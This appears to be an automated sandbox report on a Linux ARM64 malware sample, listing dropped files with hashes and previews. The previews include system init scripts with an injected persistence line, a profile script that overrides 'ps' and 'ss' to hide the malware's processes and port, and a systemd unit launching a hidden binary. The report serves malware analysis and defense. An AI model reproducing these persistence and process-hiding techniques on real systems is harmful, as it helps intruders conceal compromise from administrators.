Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: rsyncd.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Should-Start: $named autofs.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: fast remote file copy program daemon.# Description: rsync is a program that allows files to be copied to and.# from remote machines in much the same way as rcp..# This provides rsyncd daemon functionality..### END INIT INFO..set -e..# /etc/init.d/rsync: start and stop the rsync daemon..DAEMON=/usr/bin/rsync.RSYNC_ENABLE=false.RSYNC_OPTS=''.RSYNC_DEFAULTS_FILE=/etc/default/rsync.RSYNC_CONFIG_FILE=/etc/rsyncd.conf.RSYNC_PID_FILE=/var/run/rsync.pid.RSYNC_NICE_PARM=''.RSYNC_IONICE_PARM=''..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -s $RSYNC_DEFAULTS_FILE ]; then./lib/system-mark. . $RSYNC_DEFAULTS_FILE. case "x$RSYNC_ENABLE" in..xtrue\|xfalse).;;..xinetd)..exit 0....;;..*)..log_fail

/etc/init.d/rsyslog

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2899
Entropy (8bit):	5.275562121366292
Encrypted:	false
SSDEEP:	48:7cqmpKHnuoz/SWSZABLG/tm3RpZWE/eXt5Ie3nLqWpvU8lbzZdaZ2YI:75sKHuS8ZABLG1m3rZWE2Xt5Ie3nR5JT
MD5:	5D640A7C6908172899411BF2B8B1DE9C
SHA1:	B3980052CC12A5ACF1DD34D134CD822CAE09C63A
SHA-256:	A40550FEDDF8DB933722514358F364F7CCD50E9EFF123F4F408575BFB0865DE2
SHA-512:	E0AAF4ACC9F2707B6B191A5BDB36711F43D5C1890D5FFD614C03C2525E31F7993BE0308B865DA41B6D4E83A32759AEE91D8B94C293AD6174C2D94633980B3766
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: rsyslog.# Required-Start: $remote_fs $time.# Required-Stop: umountnfs $time.# X-Stop-After: sendsigs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: enhanced syslogd.# Description: Rsyslog is an enhanced multi-threaded syslogd..# It is quite compatible to stock sysklogd and can be .# used as a drop-in replacement..### END INIT INFO..#.# Author: Michael Biebl <biebl@debian.org>.#..# PATH should only include /usr/* if it runs after the mountnfs.sh script.PATH=/sbin:/usr/sbin:/bin:/usr/bin.DESC="enhanced syslogd".NAME=rsyslog..RSYSLOGD=rsyslogd.DAEMON=/usr/sbin/rsyslogd.PIDFILE=/run/rsyslogd.pid..SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$DAEMON" ] \|\| exit 0..# Read configuration variable file if it is present.[ -r /etc/default/$NAME ] && . /etc/default/$NAME..# Define LSB log_* functions... /lib/lsb/init-functions..do_st

/etc/init.d/saned

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2293
Entropy (8bit):	5.0050970590485715
Encrypted:	false
SSDEEP:	24:aruzoYFiVHCVhQJABlRi5tzldBOVQReMdHvdNw5G/9yNuFimjBklJJq5MxnR5/2F:e7Y0u/i5t7RbHwG/9diHlrXnL/iOs1
MD5:	E26E346029E7C03BC1EF969368CF6A1D
SHA1:	7AD4BCFDA2907E9EED7C2DC81820EABFC0132AE7
SHA-256:	B26A28FBDDDCA0E1A9232CF7719860044CB58D34E11AEDC1D53C9D57A689616A
SHA-512:	FBAF8DA2CA6CA008E3D3F1F93C6FAF794A0D62ECD161770F0D00A48697AC190BAB80A13EA1B2D18A4CFD35FA33BEB8891848D5DA67D1DAD2246995CD44B45910
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Provides: saned.# Required-Start: $syslog $local_fs $remote_fs.# Required-Stop: $syslog $local_fs $remote_fs.# Should-Start: dbus avahi-daemon.# Should-Stop: dbus avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: SANE network scanner server.# Description: saned makes local scanners available over the.# network..### END INIT INFO... /lib/lsb/init-functions..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/saned.NAME=saned.DESC="SANE network scanner server"..test -x $DAEMON \|\| exit 0..RUN=no.RUN_AS_USER=saned..# Get lsb functions.. /lib/lsb/init-functions..# Include saned defaults if available.if [ -f /etc/default/saned ] ; then./lib/system-mark. . /etc/default/saned.fi..DAEMON_OPTS="-a $RUN_AS_USER"..set -e..case "$1" in. start)..log_daemon_msg "Starting $DESC" "$NAME"..start-stop-daemon --start --quiet --pidfile /var/run/$N

/etc/init.d/screen-cleanup

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1274
Entropy (8bit):	5.007351824676895
Encrypted:	false
SSDEEP:	24:c26Nr+XEgBYxABoO21p4rqeYCRjeyvcsTN/RGT7d/LGld/7K9jp:cPQoO23+qeYSjeybRRGHdTGld/7K9jp
MD5:	2CB1D1EE81FD07E07C103CB77A254958
SHA1:	1B94DFA21FF802A7176767B4F0B5EEC16057B5EC
SHA-256:	6DEA1801FFE07EB969A54FA572A6A63C80D570CEABAC7F14BFD51DD40E67FD30
SHA-512:	48556EE1B364DA2B128006C2755F1C665559C2216ECA1CE06D7972A158CD27AB075859ABD842D7C2F118175A5616B6FE5B6288866A55B050A465E699EB67C491
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# $Id: init,v 1.3 2004/03/16 01:43:45 zal Exp $.#.# Script to remove stale screen named pipes on bootup..#..### BEGIN INIT INFO.# Provides: screen-cleanup.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: screen sessions cleaning.# Description: Cleans up the screen session directory and fixes its.# permissions if needed..### END INIT INFO..set -e..test -f /usr/bin/screen \|\| exit 0..SCREENDIR=/run/screen..case "$1" in.start). if test -L $SCREENDIR \|\| ! test -d $SCREENDIR; then./lib/system-mark. rm -f $SCREENDIR. mkdir $SCREENDIR. chown root:utmp $SCREENDIR. [ -x /sbin/restorecon ] && /sbin/restorecon $SCREENDIR. fi. find $SCREENDIR -type p -delete.# If the local admin has used dpkg-statoverride to install the screen.# binary with different set[ug]id bits, change the permissions of.# $SCREENDIR accordingly. BINARYPERM=`stat -c%a /usr/bin/screen`. if [ "

/etc/init.d/spice-vdagent

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2519
Entropy (8bit):	4.741374235420371
Encrypted:	false
SSDEEP:	48:DFZazGMU+rI4CXyUH0I6zroGW//AhrHoGx//AuiIngcu/syylyTIsD2E8AB6/oBa:DF0GMU+1iD6foGWQRHoGxQuiIngczVII
MD5:	652E57DD61B8A64F80D9CCCD751E4476
SHA1:	1C9E3D8CBCD6F9E6B1B3994D8246C89A52BA84CE
SHA-256:	49FEFA6609A75C4A3624B556F2593A15B2F9E0C173BFB2233B90DBC8BF52E53D
SHA-512:	657C725D48D6A56929530EC68DB98895C4EB7F3A6C94E799FBA2BF48053883F8128C03F934A63E623340FD0433FE5222685CAC501D5C8D9B81317353649E382D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.#.# spice-vdagent Agent daemon for Spice guests.#.# chkconfig: 345 70 30.# description: Together with a per X-session agent process the spice agent \.# daemon enhances the spice guest user experience with client \.# mouse mode, guest <-> client copy and paste support and more...### BEGIN INIT INFO.# Provides: . .spice-vdagent.# Required-Start: .$local_fs $remote_fs.# Required-Stop: .$local_fs $remote_fs.# Should-Start: .dbus.# Should-Stop: ..# Default-Start: .2 3 4 5.# Default-Stop: .0 1 6.# Short-Description: .Agent daemon for Spice guests.# Description: .Together with a per X-session agent process the spice agent.# .daemon enhances the spice guest user experience with client.# .mouse mode, guest <-> client copy and paste support and more..### END INIT INFO...exec="/usr/sbin/spice-vdagentd".prog="spice-vdagentd".pidfile="/var/run/spice-vdagentd/spice-vdagentd.pid".port="/dev/virtio-ports/com.redhat.spic

/etc/init.d/ssh

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4195
Entropy (8bit):	5.068394475077908
Encrypted:	false
SSDEEP:	96:jkXSV2xsYJrvcRyAHofonXHeyKyWUkO8IhQ:j1ouYJDc7IQXoXBIhQ
MD5:	C7F75670C4CBACFFCD3EE308F9EC9F4A
SHA1:	4D77E8C62706CB0601CB8031FB0368581E479792
SHA-256:	7E40FB227308DFE02D3F2EDF82B41D0FDF729A942D78D74C72EEA7A82669BE90
SHA-512:	39EB8A235611E0B6EC4C15D5C7D86274573A0C9DFD69E31D1297F50B992B0FF247382E20DAF02133BC7896B0530C215B5A1F870A6F214C9AF0DDB1F70C213CEA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides:..sshd.# Required-Start:.$remote_fs $syslog.# Required-Stop:.$remote_fs $syslog.# Default-Start:.2 3 4 5.# Default-Stop:...# Short-Description:.OpenBSD Secure Shell server.### END INIT INFO..set -e..# /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon..test -x /usr/sbin/sshd \|\| exit 0.( /usr/sbin/sshd -\? 2>&1 \| grep -q OpenSSH ) 2>/dev/null \|\| exit 0..umask 022..if test -f /etc/default/ssh; then./lib/system-mark. . /etc/default/ssh.fi... /lib/lsb/init-functions..if [ -n "$2" ]; then./lib/system-mark. SSHD_OPTS="$SSHD_OPTS $2".fi..# Are we running from init?.run_by_init() {. ([ "$previous" ] && [ "$runlevel" ]) \|\| [ "$runlevel" = S ].}..check_for_no_start() {. # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists. if [ -e /etc/ssh/sshd_not_to_be_run ]; then ./lib/system-mark..if [ "$1" = log_end_msg ]; then./lib/system-mark.. log_end_msg 0 \|\| true..fi..if ! run_by_init; then./lib/syst

/etc/init.d/udev

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	7281
Entropy (8bit):	4.982014475224516
Encrypted:	false
SSDEEP:	96:l7vIwGhwBoNNqeI4OyxwfPlBALWGGgRoG2davbKBJKCrrS2DvwvPmWGPmTbKBJKk:lOWoYiOVlz2B2daxqrS2zwGW51Wymj
MD5:	9C101DF581AD6E404FB99F3B974E743E
SHA1:	CF4A059360FEDD5F371C815772E2BAFC4532E997
SHA-256:	63F0156061B5B581C069F51ED8E3B0473CF796EA88A3BF4BE92B420D529B59AB
SHA-512:	4F7658321F7AC02F9D528088E8A572B8F8549C8FCC61366BDC43ACB61C9C216EBF597D78116A5DB4A42BDC0DC17A4AF6B55C068DB41BDC2DC661900B70A3EDE2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: udev.# Required-Start: mountkernfs.# Required-Stop: umountroot.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Start systemd-udevd, populate /dev and load drivers..### END INIT INFO..PATH="/sbin:/bin".NAME="systemd-udevd".DAEMON="/lib/systemd/systemd-udevd".DESC="hotplug events dispatcher".PIDFILE="/run/udev.pid".CTRLFILE="/run/udev/control".OMITDIR="/run/sendsigs.omit.d"..# we need to unmount /dev/pts/ and remount it later over the devtmpfs.unmount_devpts() {. if mountpoint -q /dev/pts/; then./lib/system-mark. umount -n -l /dev/pts/. fi.. if mountpoint -q /dev/shm/; then./lib/system-mark. umount -n -l /dev/shm/. fi.}..# mount a devtmpfs over /dev, if somebody did not already do it.mount_devtmpfs() {. if grep -E -q "^[^[:space:]]+ /dev devtmpfs" /proc/mounts; then./lib/system-mark. mount -n -o remount,nosuid,size=$tmpfs_size,mode=0755 -t devtmpfs devtmpfs /dev. return. fi.. if ! mount -

/etc/init.d/ufw

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2220
Entropy (8bit):	4.757250053076253
Encrypted:	false
SSDEEP:	48:1LleiFcd/nzngwPatTM/JrNWwj/Jb/SX9l:1BDFmXOQvJE
MD5:	EA501062EF1DD3FA29A5BC5479E85D5C
SHA1:	997CD2C9A15D23589A8862E2F521A6E40C807311
SHA-256:	90D6965642D81F9AF96BA403FA262381940E73011724178E6B72EC54955C0BCB
SHA-512:	95D16F0A742BA49AA8ABEA1F448F602B4F00ED3DBDD51B25E71C79A68B9F07926B252A9B66D1BFFB760247BD4C605CCD9B4ACCF3ED1D1755A7886651AC6C396D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: ufw.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: S.# Default-Stop: 1.# Short-Description: start firewall.# Description: Start ufw firewall.### END INIT INFO..set -e..PATH="/sbin:/bin"..[ -d /lib/ufw ] \|\| exit 0... /lib/lsb/init-functions..for s in "/lib/ufw/ufw-init-functions" "/etc/ufw/ufw.conf" "/etc/default/ufw" ; do. if [ -s "$s" ]; then./lib/system-mark. . "$s". else. log_failure_msg "Could not find $s (aborting)". exit 1. fi.done..error=0.case "$1" in.start). if [ "$ENABLED" = "yes" ] \|\| [ "$ENABLED" = "YES" ]; then./lib/system-mark. log_action_begin_msg "Starting firewall:" "ufw". output=`ufw_start` \|\| error="$?". if [ "$error" = "0" ]; then./lib/system-mark. log_action_cont_msg "Setting kernel variables ($IPT_SYSCTL)". fi. if [ ! -z "$output" ]; then./lib/system-mark. echo "$output" \| while read

/etc/init.d/unattended-upgrades

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	5.323775798950294
Encrypted:	false
SSDEEP:	24:aMXni+12wpFKFOGofwvlf/HNVKowwflHBhF/7Px1gr:bni23FKFpbt3GnoHBDbx2
MD5:	0BAD7D02A34912B684C93C71BFD19757
SHA1:	688CF612860E3C7125D34B63F7EF584DC65E4550
SHA-256:	FF796642243AF8B1492D63FF16F761AE942A4AE7CCFA17A05E3CF533B0D6E4DB
SHA-512:	D806A1D5B8AD9AA0A51841825DA8ACD4DA299D331874CD6FD777BCD6802B8BC7498B118B6D85F7E1793749EDCD3ABBD57EA78620226D34E43DA3AE1EE73BA684
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Provides: unattended-upgrade-shutdown-check.# Default-Start: 2 3 4 5.# Default-Stop: 0 6.# Short-Description: Check if unattended upgrades are being applied.# Description: Check if unattended upgrades are being applied.# and wait for them to finish.### END INIT INFO.set -e..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..NAME="unattended-upgrades-shutdown".DESC="unattended package upgrades shutdown".SCRIPTNAME="/etc/init.d/$NAME".SHUTDOWN_HELPER="/usr/share/unattended-upgrades/unattended-upgrade-shutdown"..if [ -x /usr/bin/python3 ]; then./lib/system-mark. PYTHON=python3.else. PYTHON=python.fi..# Load the VERBOSE setting and other rcS variables.. /lib/init/vars.sh..# Define LSB log_* functions..# Depend on lsb-base (>= 3.2-14) to ensure that this file is present.. /lib/lsb/init-functions..case "$1" in.

/etc/init.d/uuidd

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1358
Entropy (8bit):	5.209136415739334
Encrypted:	false
SSDEEP:	24:aNmC4ozLk8BZa8LNfwa0aDEPLu5CB5ZM5AHdwi/mqT0KtOC:3VozBjdh0a4PLuIBvMGwitIKtl
MD5:	A18F61759309F7DAE1CF4D379B0DC2E0
SHA1:	38BB4BFF894D6973BC2B59145A28CD93FC2A2B26
SHA-256:	8750FAACA2F9E6ED50996EBA4C23F884241C27A375CCFE79801715044BEA7232
SHA-512:	18489A3A5A446A80D1EEB324AD9823480FF2C53AF1703D4DB6B3DE42A7901B0223135948FD5162F60418F1AB7B7AA1CB3D3CA5C7D1E9E05F6048204DD913D6FB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh -e.### BEGIN INIT INFO.# Provides: uuidd.# Required-Start: $time $local_fs $remote_fs.# Required-Stop: $time $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: uuidd daemon.# Description: Init script for the uuid generation daemon.### END INIT INFO.#.# Author:."Theodore Ts'o" <tytso@mit.edu>.#.set -e..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DAEMON=/usr/sbin/uuidd.UUIDD_USER=uuidd.UUIDD_GROUP=uuidd.UUIDD_DIR=/run/uuidd.PIDFILE=$UUIDD_DIR/uuidd.pid..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..case "$1" in. start)..log_daemon_msg "Starting uuid generator" "uuidd"..if ! test -d $UUIDD_DIR; then./lib/system-mark...mkdir -p $UUIDD_DIR...chown -R $UUIDD_USER:$UUIDD_GROUP $UUIDD_DIR..fi..start_daemon -p $PIDFILE $DAEMON..log_end_msg $?. ;;. stop)..log_daemon_msg "Stopping uuid generator" "uuidd"..killproc -p $PIDFILE $DAEMON..log_end_msg $?. ;;. status)..if pidofproc -p $PIDFILE $DAEMON >/dev/null 2>&

/etc/init.d/x11-common

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2911
Entropy (8bit):	4.894244496059908
Encrypted:	false
SSDEEP:	48:ZETewCRgFkV5ZSVwxcRypF1vrBy9DuIpPX5uCXAepm1L3/WAhyC76XGMgH3:SggFkViVNePT09DuYX5HX3aLdqX8
MD5:	E39C2FE947515C58470F91A5A6D1ED5B
SHA1:	00C7881A33ED0425C236C9544BD43E7BC9AE46DD
SHA-256:	37CCB9BB9C51FEB17B9943BB7DF42E8E03342F5611EC649E5C6E5A87A5A2840D
SHA-512:	AB26218676CEA2C319F29911650AA98C2E7D5578E9E2130D44997FDDE2E59765E1AAC52E0EE2C466E231B55AFFCA92B9C0A67A8381725D5433C3392DE04FF7F3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# /etc/init.d/x11-common: set up the X server and ICE socket directories.### BEGIN INIT INFO.# Provides: x11-common.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: set up the X server and ICE socket directories.### END INIT INFO..set -e..PATH=/usr/bin:/usr/sbin:/bin:/sbin.SOCKET_DIR=.X11-unix.ICE_DIR=.ICE-unix... /lib/lsb/init-functions.if [ -f /etc/default/rcS ]; then./lib/system-mark. . /etc/default/rcS.fi..do_restorecon () {. # Restore file security context (SELinux).. if which restorecon >/dev/null 2>&1; then./lib/system-mark. restorecon "$1". fi.}..# create a directory in /tmp..# assumes /tmp has a sticky bit set (or is only writeable by root).set_up_dir () {. DIR="/tmp/$1".. if [ "$VERBOSE" != no ]; then./lib/system-mark. log_progress_msg "$DIR". fi. # if $DIR exists and isn't a directory, move it aside. if [ -e $DIR ] && ! [ -d $DIR ] \|\| [ -h $DIR ]; then./lib/system-mar

/etc/profile.d/bash_cfg.sh

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.261725074756386
Encrypted:	false
SSDEEP:	3:TKH/binKE:siKE
MD5:	BE6E09DEC0A6249FD83851DAF92AE627
SHA1:	9FF81BB38A0FD5432575455D7D8334BD8D983CF7
SHA-256:	44BDD8B7F00094E163540A2B8C3CF973E72499BAA20B78F8051E2422163E1D0D
SHA-512:	CCF2BDC30F45A132DBDBBF1F008A06525B7EE4A46F09A11025BA05A55835F67356DBB4F8E826AFB28C73AFE5653C09C7CEAA082A2194A0D7C78BE101A4AD1F30
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/bash./etc/profile.d/bash_cfg

/etc/profile.d/gateway.sh

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	Bourne-Again shell script, ASCII text executable, with very long lines (910)
Category:	dropped
Size (bytes):	6339
Entropy (8bit):	4.823434049250399
Encrypted:	false
SSDEEP:	192:sjahyOjP3ECqh8teVjahyOjP3ECqh8tePjahyOjP3ECqh8teDjahyOjP3ECqh8tW:0NfDN9JN
MD5:	ED24505B9AC251729018789C81AC4B3D
SHA1:	B165D8BB872B7AD39A5479B8065918B1C8134625
SHA-256:	BE7AB0D71E19B7452A79428EDAF82EC1E53838EF92D71E580DC5CFD95A6E4654
SHA-512:	48A545E40F9121DDC139CFF3867983D68CD5141519C443278BE186382D8C8A39E392397E0D87ABB322D7A19BF7E2EB15966E16A224C5051225131EB3AD861547
Malicious:	true
Preview:	#!/bin/bash.function ps { proc_name=$(/usr/bin/ps $@);proc_name=$(echo "$proc_name" \| sed -e '/32676/d');proc_name=$(echo "$proc_name" \| sed -e '/dns-tcp4/d');proc_name=$(echo "$proc_name" \| sed -e '/quotaoff.service/d');proc_name=$(echo "$proc_name" \| sed -e '/System.mod/d');proc_name=$(echo "$proc_name" \| sed -e '/gateway.sh/d');proc_name=$(echo "$proc_name" \| sed -e '/32676/d');proc_name=$(echo "$proc_name" \| sed -e '/.mod/d');proc_name=$(echo "$proc_name" \| sed -e '/libgdi.so.0.8.1/d');proc_name=$(echo "$proc_name" \| sed -e '/opt.services.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/system-mark/d');proc_name=$(echo "$proc_name" \| sed -e '/ifconfig.cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/sleep/d');proc_name=$(echo "$proc_name" \| sed -e '/seeintlog/d');proc_name=$(echo "$proc_name" \| sed -e '/bash_cfg/d');proc_name=$(echo "$proc_name" \| sed -e '/utZX7JAuMU.elf/d');echo "$proc_name"; }.function ss { proc_name=$(/usr/bin/ss $@);proc_name=$(echo "$proc_name" \| sed -e '/3267

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/proc/5676/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/proc/5755/loginuid

Download File

Process:	/usr/sbin/cron
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

/run/crond.pid

Download File

Process:	/usr/sbin/cron
File Type:	ASCII text
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:Hdpvn:9pvn
MD5:	6E68F47198226542CEE831D1576FDB24
SHA1:	809C04350CA7492D3930BF8B005061A30FC11F00
SHA-256:	156236B1AFFFE40FACA486711AFEE2A2D544FF86177166062C1B612135EAEDD2
SHA-512:	DCAE5CEF45B72FDD9974FA86D30A140827BC15352D6FBB654124555AE5A140265481E8655CC2AD81F6CA5578FBAD2ED6CAD7C4FCDCD0807A39160487340868DC
Malicious:	false
Preview:	5784.5784.

/tmp/qemu-open.psSl7h (deleted)

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	122
Entropy (8bit):	2.969641606841397
Encrypted:	false
SSDEEP:	3:FRn0QOzFXYMdSdRFNvX:rn05FX3dSj
MD5:	FD500695AA0313D067AB3D94C256E15F
SHA1:	CCD8AA8710EF0397DEF20FB452D134D1F41ACC42
SHA-256:	53FC6D92099F439CD5B98AE283D5EE4E1BA38E43E6124E826DD6910270F02350
SHA-512:	7D3BA384AE3983A863B6CD3346058096973B2A1AF5AD7FC01E9D35E382D82090BEAFC5AF6225CDF51CA39242C0C6A9B54C449F0EA1EA35D0DB64D205986E7F28
Malicious:	false
Preview:	5542 (/tmp/utZX7JAuMU.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298784 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.

/usr/lib/systemd/system/quotaoff.service

Download File

Process:	/tmp/utZX7JAuMU.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	186
Entropy (8bit):	4.795801274247707
Encrypted:	false
SSDEEP:	3:zMZa7kKXtERv+2AXTMikAdIgQ+NRs7WRA2Iav817WRA2IavpsRs7WRA2Iav2rSkc:z86XWRBADMD+ns7Hvx17Hv2sRs7HvtLc
MD5:	B02DE6CD28CD922B18D9D93375A70D8B
SHA1:	021426A5A2FF9EDC80BA5936C94B37525538885E
SHA-256:	D8D8E5CD33AA3450CD74C63716A02F3DFF39EFEF2836559F110BC93663B1380A
SHA-512:	DB3FE03AD5E599E6C03AAEC7BF1242F5509FBB624ADB9AFB7499E25487DAEF3F3F1C6BABF51570B527A5AC5C9F4B079AE4CC53BAA9497C0A121328BEF8D04422
Malicious:	false
Preview:	[Unit].Description=linux.After=network.target.[Service].Type=forking.ExecStart=/boot/System.mod.ExecReload=/boot/System.mod.ExecStop=/boot/System.mod.[Install].WantedBy=multi-user.target

Static File Info

General

File type:	ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), statically linked, Go BuildID=p-qnCsvCpziwx1SpyD2u/_QEUImz47GMLE05aSFRk/Ybj99e1GSLjgXcWVw2M1/UybnlT3nZEaLgnM7kiPF, stripped
Entropy (8bit):	5.808610952259604
TrID:	ELF Executable and Linkable format (generic) (4004/1) 98.45% Lumena CEL bitmap (63/63) 1.55%
File name:	utZX7JAuMU.elf
File size:	2'031'616 bytes
MD5:	13888354bd58a58d99e8394c973ca7a8
SHA1:	ddaa889e49897d1aaed0896d21ce66fc80b11ff5
SHA256:	8a3df17080e967ed722bfb49098119bb0623afcdd87496da95e75eebc9f79f2e
SHA512:	315799f4bab4fb7731079d4dce980ae040ab2f54c72db1d9358fa66cba3eae72913e5c9cb17f0268f988ab818baf22eb796456ffef67642ba6d5b4f2e9b860ab
SSDEEP:	24576:/wRmgu8dG9qDQtfTBmW0NREmCNPCo98U4TprOEa6QWgrz1v:/euCG9qE5BS4AUrz1
TLSH:	E3955B85BC9DA912E9C97EB56F2502D07225FC4D9F81C7177A00BBAE6DF23588F21360
File Content Preview:	.ELF............................@...................@.8...@.............@.......@.......@...............................................................d.......d..............................................................................................

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	AArch64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x717f0
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	7
Section Header Offset:	456
Section Header Size:	64
Number of Section Headers:	14
Header String Table Index:	3

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.text	PROGBITS	0x11000	0x1000	0xd7f00	0x0	0x6	AX	16
.rodata	PROGBITS	0xf0000	0xe0000	0x5853f	0x0	0x2	A	32
.shstrtab	STRTAB	0x0	0x138540	0x98	0x0	0x0		1
.typelink	PROGBITS	0x1485e0	0x1385e0	0x8dc	0x0	0x2	A	32
.itablink	PROGBITS	0x148ec0	0x138ec0	0x250	0x0	0x2	A	32
.gosymtab	PROGBITS	0x149110	0x139110	0x0	0x0	0x2	A	1
.gopclntab	PROGBITS	0x149120	0x139120	0x90818	0x0	0x2	A	32
.go.buildinfo	PROGBITS	0x1e0000	0x1d0000	0xe0	0x0	0x3	WA	16
